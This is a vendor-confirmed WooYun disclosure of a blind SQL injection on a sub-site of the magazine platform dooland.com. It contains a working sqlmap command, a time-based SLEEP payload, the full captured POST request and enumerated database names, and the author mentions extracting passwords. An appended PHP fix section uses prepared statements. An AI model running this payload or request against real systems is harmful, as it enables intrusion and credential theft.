Vulnerability summary

Defect ID: wooyun-2015-0110819

Title: Dooland (读览天下) SQL injection vulnerability

Affected vendor: dooland.com

Author: heh3

Submitted: 2015-04-28 14:17

Fixed: 2015-06-14 11:24

Published: 2015-06-14 11:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-28: Details sent to the vendor; awaiting the vendor's response
2015-04-30: Vendor confirmed; details disclosed to the vendor only
2015-05-10: Details disclosed to core white hats and domain experts
2015-05-20: Details disclosed to regular white hats
2015-05-30: Details disclosed to intern white hats
2015-06-14: Details disclosed to the public

Brief description:

The Dooland Henan sub-site has a SQL injection vulnerability. I stumbled on an injection point while testing. Someone previously reported that the same vulnerability existed on the official main site; see http://www.wooyun.org/bugs/wooyun-2010-052121. I don't know whether other sub-sites are affected, but henu.dooland.com definitely is. It is a blind injection.

Detailed description:

The Dooland Henan sub-site has a SQL injection vulnerability. I stumbled on an injection point while testing. Someone previously reported that the same vulnerability existed on the official main site; see WooYun: Dooland main-site SQL injection (读览天下主站sql注入). I don't know whether other sub-sites are affected, but henu.dooland.com definitely is. It is a blind injection.
The injection point is /site/magazine/ReadStat/stat_page_click.php
The vendor replied on the main-site report that it had been patched; was the sub-site simply left alone?

Proof of vulnerability:

Save the POST data as sql.txt
sqlmap.py -r sql.txt -p id --dbs
Parameter: id (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: block=%E5%88%86%E7%B1%BB%E9%A1%B5&id=2' AND (SELECT * FROM (SELECT
SLEEP(5)))qABN) AND 'XOjN'='XOjN&type=mag
---
[11:44:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.33
back-end DBMS: MySQL 5.0.12
[11:44:45] [INFO] fetching database names
[11:44:45] [INFO] fetching number of databases
[11:44:45] [INFO] resumed: 69
[11:44:45] [INFO] resumed: infor\x04\\?84ation_schema
[11:44:45] [INFO] resumed: 96doc
[11:44:45] [INFO] resumed: AlightingService
[11:44:45] [INFO] resumed: OEM
[11:44:45] [INFO] resumed: SearchQon
[11:44:45] [INFO] resumed: amfans
[11:44:45] [INFO] resumed: android_single
[11:44:45] [INFO] resumed: autofan_client\x05
[11:44:45] [INFO] resumed: bugtraeker
[11:44:45] [INFO] resumed: bugtreckwr_mzntis
[11:44:45] [INFO] resumed: ihildren
[11:44:45] [INFO] resumed: comoon%
[11:44:45] [INFO] resumed: c\x05\r~p_nmws
[11:44:45] [INFO] resumed: dool|nuecliunt
[11:44:45] [INFO] resumed: dsps_Urpup
[11:44:45] [INFO] resumed: dzns_Photo\x0c\x11=\x08
[11:44:45] [INFO] resumed: esns_bqogE\x12
[11:44:45] [INFO] resumed: dsns_dartoynq
[11:44:45] [INFO] resumed: dsns_shzre#\x05
[11:44:45] [INFO] resumed: d\\?e1Nns_tmp
[11:44:45] [INFO] resumed: dsns_u}er
[11:44:45] [INFO] resumed: dudubmo
[11:44:45] [INFO] resumed: dwdubao_ad\\?dc
[11:44:45] [INFO] resumed: J0udubcu_bak
[11:44:45] [INFO] resumed: dudubao_boqk
[11:44:45] [INFO] resumed: dudubao`hd
[11:44:45] [INFO] resumed: dudubao`stat
[11:44:45] [INFO] resumed: eCatapogSjrvice
[11:44:45] [INFO] resumed: expand
[11:44:45] [INFO] resumed: flipdu
[11:44:45] [INFO] resumed: gtlisten
[11:44:45] [INFO] resumed: hk
[11:44:45] [INFO] resumed: hzaspt
[11:44:45] [INFO] resumed: inswapaper
[11:44:45] [INFO] resumed: ipad
[11:44:45] [INFO] resumed: ipad_souni_book
[11:44:45] [INFO] resumed: maglook
[11:44:45] [INFO] resumed: maglook_vcart
[11:44:45] [INFO] resumed: maika
[11:44:45] [INFO] resumed: mantis
[11:44:45] [INFO] resumed: mysql
[11:44:45] [INFO] resumed: news
[11:44:45] [INFO] resumed: newspaper
[11:44:45] [INFO] resumed: np
[11:44:45] [INFO] resumed: opds_aldiko
[11:44:45] [INFO] resumed: photo_tmp
[11:44:45] [INFO] resumed: poly
[11:44:45] [INFO] resumed: push
[11:44:45] [INFO] resumed: snsapp
[11:44:45] [INFO] resumed: spider
[11:44:45] [INFO] resumed: stat_dudubao
[11:44:45] [INFO] resumed: test
[11:44:45] [INFO] resumed: testdb
[11:44:45] [INFO] resumed: tinyconference
[11:44:45] [INFO] resumed: tob_client
[11:44:45] [INFO] resumed: tob_clienu_bak
[11:44:45] [INFO] resumed: tob_client_bak_20130201
[11:44:45] [INFO] resumed: tob_health
[11:44:45] [INFO] resumed: tob_health_admin
[11:44:45] [INFO] resumed: tob_health_bau
[11:44:45] [INFO] resumed: tob_health_debug
[11:44:45] [INFO] resumed: tob_health_hd
[11:44:45] [INFO] resumed: tob_health_static
[11:44:45] [INFO] resumed: uch
[11:44:45] [INFO] resumed: vilady
[11:44:45] [INFO] resumed: vip_statistics
[11:44:45] [INFO] resumed: wejbo
[11:44:45] [INFO] resumed: weibo_lianxiang
[11:44:45] [INFO] resumed: zazhishe
available databases [69]:
[*] `96doc`
[*] `autofan_client`
~p_nmws`
[*] `comoon%`
[*] `d\?e1Nns_tmp`
[*] `dool|nuecliunt`
[*] `dsns_shzre#`
[*] `dsns_u}er`
[*] `dudubao`hd`
[*] `dudubao`stat`
[*] `dwdubao_ad\?dc`
[*] `dzns_Photo`
[*] `esns_bqogE`
[*] `infor\?84ation_schema`
[*] AlightingService
[*] amfans
[*] android_single
[*] bugtraeker
[*] bugtreckwr_mzntis
[*] dsns_dartoynq
[*] dsps_Urpup
[*] dudubao_boqk
[*] dudubmo
[*] eCatapogSjrvice
[*] expand
[*] flipdu
[*] gtlisten
[*] hk
[*] hzaspt
[*] ihildren
[*] inswapaper
[*] ipad
[*] ipad_souni_book
[*] J0udubcu_bak
[*] maglook
[*] maglook_vcart
[*] maika
[*] mantis
[*] mysql
[*] news
[*] newspaper
[*] np
[*] OEM
[*] opds_aldiko
[*] photo_tmp
[*] poly
[*] push
[*] SearchQon
[*] snsapp
[*] spider
[*] stat_dudubao
[*] test
[*] testdb
[*] tinyconference
[*] tob_client
[*] tob_client_bak_20130201
[*] tob_clienu_bak
[*] tob_health
[*] tob_health_admin
[*] tob_health_bau
[*] tob_health_debug
[*] tob_health_hd
[*] tob_health_static
[*] uch
[*] vilady
[*] vip_statistics
[*] weibo_lianxiang
[*] wejbo
[*] zazhishe
[11:48:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.33
back-end DBMS: MySQL 5.0.12
[11:48:57] [INFO] testing if current user is DBA
[11:48:57] [INFO] fetching current user
[11:48:57] [INFO] resumed: dbadm@121.9.213.7
current user is DBA: True
Port 3306 is open, but it seems to restrict access from external IPs.
The injection is too slow, so I only pulled a few key passwords, which I won't paste here because someone already posted them before. Don't your admins ever change passwords?

POST /site/magazine/ReadStat/stat_page_click.php HTTP/1.1
Content-Length: 180
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://henu.dooland.com:80/
Cookie: PHPSESSID=1ca909fo4klstvrk38cgp6i725; view_magid_all=84251%2C84328%2C84306%2C84303%2C84235%2C0%2C84302%2C84250%2C
Host: henu.dooland.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
block=%E5%88%86%E7%B1%BB%E9%A1%B5&id=2&type=mag


Fix recommendation:

Just apply the same fix as on the main site one more time, though I don't know whether the main site was actually patched last time. @xsser boss, look, I'm still just a passer-by; can you give me ten thousand Rank, even for one minute? I only want to take a screenshot!
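As an added example (it is not part of this report and not dooland.com's code), the following PHP shows what the fix the author asks for looks like for an endpoint shaped like stat_page_click.php, which receives block, id and type by POST. The vulnerable pattern at the top is a hypothetical reconstruction of how a time-based blind injection becomes possible, not the site's actual source; the table and column names, the allowed values for type, and the connection details are all assumptions.

```php
<?php
// Added example, not code from the report or from dooland.com.
// Table/column names (page_click_stat, mag_id, type, block, clicks),
// the allow-list for type, and the DSN/credentials are assumptions.

// Hypothetical vulnerable pattern (reconstruction): the attacker-controlled id is
// concatenated into the SQL string, so a closing quote followed by
// AND (SELECT SLEEP(5)) is executed as SQL and the response delay leaks data
// one bit at a time, which is exactly what the sqlmap output above relies on.
function recordClickVulnerable(PDO $db, array $post): bool
{
    $sql = "UPDATE page_click_stat SET clicks = clicks + 1 "
         . "WHERE mag_id = '" . $post['id'] . "' AND type = '" . $post['type'] . "'";
    return $db->query($sql) !== false;
}

// Hardened version: validate the shape of each input, then bind the values with a
// prepared statement so they are sent as data and can never be parsed as SQL.
function recordClickSafe(PDO $db, array $post): bool
{
    // id must be a positive integer; "2' AND (SELECT ...)" fails this check outright.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return false;
    }
    // type is a small enumerated set (assumed values); allow-list it instead of escaping.
    $type = $post['type'] ?? '';
    if (!in_array($type, ['mag', 'book', 'paper'], true)) {
        return false;
    }
    // block is free text (the request carries a URL-encoded Chinese label); cap its length.
    $block = mb_substr((string) ($post['block'] ?? ''), 0, 64);

    $stmt = $db->prepare(
        'INSERT INTO page_click_stat (mag_id, type, block, clicks) VALUES (:id, :type, :block, 1) '
        . 'ON DUPLICATE KEY UPDATE clicks = clicks + 1'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':type', $type, PDO::PARAM_STR);
    $stmt->bindValue(':block', $block, PDO::PARAM_STR);
    return $stmt->execute();
}

// Disable emulated prepares so the MySQL server itself performs the binding.
$db = new PDO('mysql:host=127.0.0.1;dbname=stat_db;charset=utf8mb4', 'stat_user', 'secret', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

http_response_code(recordClickSafe($db, $_POST) ? 204 : 400);
```

Two points from the report bear on this beyond the query itself. The sqlmap output shows that the account behind the statistics page is a DBA and can enumerate every database on the server, so the account used by recordClickSafe should be a dedicated user with INSERT and UPDATE on the statistics table only; even if another injection slipped through, it would then be limited to that table. And because the main-site report was fixed while the sub-site was not, the same parameterised handler should be deployed to every host that serves this endpoint rather than patched on one site at a time.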

Copyright notice: when reposting, please credit the source: heh3@WooYun


Vendor response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-04-30 11:23

Vendor reply:

Confirmed

Latest status:

None yet